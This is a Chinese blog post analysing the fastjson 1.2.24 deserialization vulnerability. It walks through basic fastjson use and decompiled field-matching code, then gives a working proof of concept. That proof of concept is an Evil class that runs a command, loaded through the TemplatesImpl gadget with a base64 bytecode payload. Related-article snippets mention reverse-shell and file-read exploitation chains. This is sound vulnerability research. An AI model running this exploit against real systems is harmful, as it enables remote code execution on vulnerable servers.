fastjson反序列化漏洞分析

最新推荐文章于 2024-08-09 20:21:52 发布
最新推荐文章于 2024-08-09 20:21:52 发布
阅读量2.2k 收藏
点赞数
文章标签: fastjson 反序列化 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38043244/article/details/72842728
版权

基本使用

maven

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>

序列化

package fastjsonHelloWorld;

public class User {
    private String name;
    private Integer age;
    private String email;

    public String getName_1() {
        return name;
    }

    public void setName_1(String name) {
        this.name = name;
    }

    public Integer getAge() {
        return age;
    }

    public void setAge(Integer age) {
        this.age = age;
    }

    public String toString() {
        return "name:" + name + " age:" + age + " email:" + email;
    }
}
package fastjsonHelloWorld;

import java.util.ArrayList;
import java.util.List;
import com.alibaba.fastjson.JSON;

public class fastjsonSerialize {

    public static void main(String[] args) {
        User user = new User();
        user.setName_1("xiaomin");
        user.setAge(18);

        String json = JSON.toJSONString(user);
        System.out.println(json);

        List<User> users = new ArrayList<User>();
        users.add(user);
        String jsonlist = JSON.toJSONString(users);
        System.out.println(jsonlist);
    }
}

输出:

{"age":18,"name_1":"xiaomin"}
[{"age":18,"name_1":"xiaomin"}]

反序列化

package fastjsonHelloWorld;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;

public class fastjsonDeserialize {

    public static void main(String[] args) {
        String json = "{\"@type\":\"fastjsonHelloWorld.User\",\"name_1\":\"xiaomin\",\"age\":20, \"email\":\"xxx@qq.com\"}";
        User user = (User) JSON.parse(json);
        System.out.println(user.toString());

        Object obj = JSON.parseObject(json, Object.class, Feature.SupportNonPublicField);
        System.out.println(obj);
    }
}

输出:

name:xiaomin age:20 email:null
name:xiaomin age:20 email:xxx@qq.com

get/set方法匹配规则

com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.smartMatch(String key)匹配get/set方法时,会去掉field前的_和-,并忽略大小写。

  public FieldDeserializer smartMatch(String key)
  {
    if (key == null) {
      return null;
    }
    FieldDeserializer fieldDeserializer = getFieldDeserializer(key);
    FieldDeserializer fieldDeser;
    if (fieldDeserializer == null)
    {
      boolean startsWithIs = key.startsWith("is");
      for (fieldDeser : this.sortedFieldDeserializers)
      {
        FieldInfo fieldInfo = fieldDeser.fieldInfo;
        Class<?> fieldClass = fieldInfo.fieldClass;
        String fieldName = fieldInfo.name;
        if (fieldName.equalsIgnoreCase(key))
        {
          fieldDeserializer = fieldDeser;
          break;
        }
        if ((startsWithIs) && ((fieldClass == Boolean.TYPE) || (fieldClass == Boolean.class))) {
          if (fieldName.equalsIgnoreCase(key.substring(2)))
          {
            fieldDeserializer = fieldDeser;
            break;
          }
        }
      }
    }
    boolean snakeOrkebab;
    String key2;
    int i;
    if (fieldDeserializer == null)
    {
      snakeOrkebab = false;
      key2 = null;
      char ch;
      for (i = 0; i < key.length(); i++)
      {
        ch = key.charAt(i);
        if (ch == '_')
        {
          snakeOrkebab = true;
          key2 = key.replaceAll("_", "");
          break;
        }
        if (ch == '-')
        {
          snakeOrkebab = true;
          key2 = key.replaceAll("-", "");
          break;
        }
      }
      if (snakeOrkebab)
      {
        fieldDeserializer = getFieldDeserializer(key2);
        if (fieldDeserializer == null)
        {
          FieldDeserializer[] arrayOfFieldDeserializer2 = this.sortedFieldDeserializers;ch = arrayOfFieldDeserializer2.length;
          for (fieldDeser = 0; fieldDeser < ch; fieldDeser++)
          {
            FieldDeserializer fieldDeser = arrayOfFieldDeserializer2[fieldDeser];
            if (fieldDeser.fieldInfo.name.equalsIgnoreCase(key2))
            {
              fieldDeserializer = fieldDeser;
              break;
            }
          }
        }
      }
    }
    if (fieldDeserializer == null) {
      for (FieldDeserializer fieldDeser : this.sortedFieldDeserializers) {
        if (fieldDeser.fieldInfo.alternateName(key))
        {
          fieldDeserializer = fieldDeser;
          break;
        }
      }
    }
    return fieldDeserializer;
  }

总结

  • 反序列化时需要输入的json字符串指定@type
  • 对于private成员,默认通过匹配get/set方法来反序列化,匹配不到则无法反序列化类成员变量。
  • 对于public成员,默认通过匹配get/set方法来反序列化,匹配不到则直接匹配类成员名;再匹配不到则无法反序列化类成员变量。
  • 如果开启Feature.SupportNonPublicField,则private成员反序列化规则同public成员。
  • 类成员和类方法的匹配规则为smartMatch,去掉field前的_和-,并忽略大小写

漏洞分析

POC

    <dependencies>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
        <dependency>
            <groupId>commons-io</groupId>
            <artifactId>commons-io</artifactId>
            <version>2.4</version>
        </dependency>
        <dependency>
            <groupId>commons-codec</groupId>
            <artifactId>commons-codec</artifactId>
            <version>1.9</version>
        </dependency>
    </dependencies>
package fastjsonHelloWorld;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
public class Evil extends AbstractTranslet {
    public Evil() throws IOException {
        Runtime.getRuntime().exec("calc");
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {     
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler)
            throws TransletException {
    }
}
package fastjsonHelloWorld;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;

import org.apache.commons.codec.binary.Base64;
import org.apache.commons.io.IOUtils;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;


public class fastjsonPOC {

    public static String aposToQuotes(String json){
        return json.replace("'", "\"");
    }

    public static String readClassStr(String cls){
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());
    }

    public static void main(String[] args) throws Exception {
        String evilcode = readClassStr("D:\\Users\\workspace\\fastjsonHelloWorld\\target\\classes\\fastjsonHelloWorld\\Evil.class");
        //{"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes": ["yv66vgAAADEALAcAAgEAF2Zhc3Rqc29uSGVsbG9Xb3JsZC9FdmlsBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEACkV4Y2VwdGlvbnMHAAkBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAEQ29kZQoAAwAMDAAFAAYKAA4AEAcADwEAEWphdmEvbGFuZy9SdW50aW1lDAARABIBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7CAAUAQAEY2FsYwoADgAWDAAXABgBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAGUxmYXN0anNvbkhlbGxvV29ybGQvRXZpbDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYHACABADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhACEAAQADAAAAAAADAAEABQAGAAIABwAAAAQAAQAIAAoAAABAAAIAAQAAAA4qtwALuAANEhO2ABVXsQAAAAIAGQAAAA4AAwAAAAkABAAKAA0ACwAaAAAADAABAAAADgAbABwAAAABAB0AHgACAAcAAAAEAAEAHwAKAAAAPwAAAAMAAAABsQAAAAIAGQAAAAYAAQAAAA4AGgAAACAAAwAAAAEAGwAcAAAAAAABACEAIgABAAAAAQAjACQAAgABAB0AJQACAAcAAAAEAAEAHwAKAAAASQAAAAQAAAABsQAAAAIAGQAAAAYAAQAAABMAGgAAACoABAAAAAEAGwAcAAAAAAABACEAIgABAAAAAQAmACcAAgAAAAEAKAApAAMAAQAqAAAAAgAr"],"_name": "a.b","_tfactory": {},"_outputProperties": {}}
        String json = aposToQuotes(
                "{" + 
    "'@type': 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'," +
    "'_bytecodes': " + "['" + evilcode + "']," +
    "'_name': 'a.b'," + 
    "'_tfactory': {}," + 
    "'_outputProperties': {}" + 
"}");
        System.out.println(json);
        JSON.parseObject(json,Object.class,Feature.SupportNonPublicField);
    }
}

触发条件

  • fastjson <= 1.2.24
  • Feature.SupportNonPublicField

参考

源码

http://download.csdn.net/detail/m0_38043244/9858439

m0_38043244
关注
Fastjson反序列化漏洞利用分析合集
不忘初心,护天下安全!
07-18 252
流程的话就是通过靶场主机,发送payload,访问远程主机的9999端口也就是上边的ip2,之后因为9999端口开启的rmi服务,所以会直接访问7777端口的shell.class,之后执行class文件,进行反弹shell到公网ip(上边的ip1)在前边的POJO中特意提到过,这个toJSONString会默认执行调用类中的getter(),所以当我们payload传入BasicDataSource类后,就会调用他对应的getter()——getConnection()...
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6375
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
FastJson反序列化
Finlinlts的博客
08-30 3677
Fastjson允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用
Fastjson反序列化漏洞
最新发布
qq_50296568的博客
08-09 1168
使用恶意MySQL的url作为参数创建一个com.mysql.cj.jdbc.admin.MiniAdmin对象可以通过MySQL的JDBC驱动的com.mysql.cj.jdbc.admin.MiniAdmin类创建一个指定url的JDBC连接。再通过LOAD DATA LOCAL INFILE语句读取任意文件。只要用户期望类继承自 Throwable 类,Fastjson便会将该类信任,从而造成只要是继承Throwable的任意类都可以被反序列化。生成恶意mysql文件后,
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 3867
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
Cynthia - Fastjson deserialization vulnerability
st0ut的博客
03-25 3518
This is a Fastjson deserialization vulnerability 1.login fast Login required 2.Fastjson deserialization Trigger point http://xx.xxx.xxx.xx/cynthia/template/saveTemplateMailConfig.do?templateId=744313&templateMailOptions={“b”:{"\u0040\u0074\u0079\u007
fastjson反序列化分析
qq_50854662的博客
10-13 399
fastjson反序列化分析
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
Fastjson反序列化漏洞原理与复现_fastjson反序化漏洞解决(1)
m0_60575487的博客
04-07 689
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
fastjson反序列化
walton的博客
11-06 1637
对于maven工程,要将json数据反序列化需要个步骤: 1、添加fastjson的依赖 com.alibaba fastjson 1.2.39 2、安装GsonFormat插件(以下是IntelliJ Idea安装GsonFormat,其它ide的可以自行百度怎么安装插件) file--》settings--》Plugins,在搜索框中输入Gson
Fastjson反序列化
热门推荐
Christ1na的博客
11-15 1万+
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。fastjson是目前java语言中最快的json库,其功能完备且使用简单,因而使用非常广泛。自fastjson在1.2.24版本爆出第一次漏洞到至今,有着多次的安全补丁更新和绕过。
fastjson 反序列化漏洞
08-24
fastjson 反序列化漏洞是指在使用 fastjson 库解析 JSON 字符串时存在安全风险的问题。具体来说,fastjson 反序列化漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串时,可能会触发不安全的反序列化操作,导致攻击者能够执行任意代码或进行其他恶意操作。 这种漏洞通常是由于 fastjson反序列化过程中缺乏足够的安全检查和过滤机制,导致恶意用户能够构造特定的 JSON 字符串来触发漏洞。攻击者可以通过在 JSON 字符串中插入恶意的 Java 代码或利用已知的 Java 反序列化漏洞来执行任意代码。 为了防止 fastjson 反序列化漏洞的利用,建议遵循以下几点: 1. 尽量避免使用 fastjson 库,可以考虑使用其他更安全的 JSON 库。 2. 更新 fastjson 到最新版本,以获取最新的修复和安全增强功能。 3. 对用户输入的 JSON 字符串进行严格的验证和过滤,确保只有合法的、受信任的数据被反序列化。 4. 配置 fastjson 的 ParserConfig,限制反序列化操作只能处理预期的类型。 5. 避免在反序列化过程中执行不可信的代码,尽量将反序列化操作限制在有限的安全环境中。 总之,fastjson 反序列化漏洞是一个需要注意和防范的安全问题,开发者在使用 fastjson 库时应当保持警惕并采取相应的安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值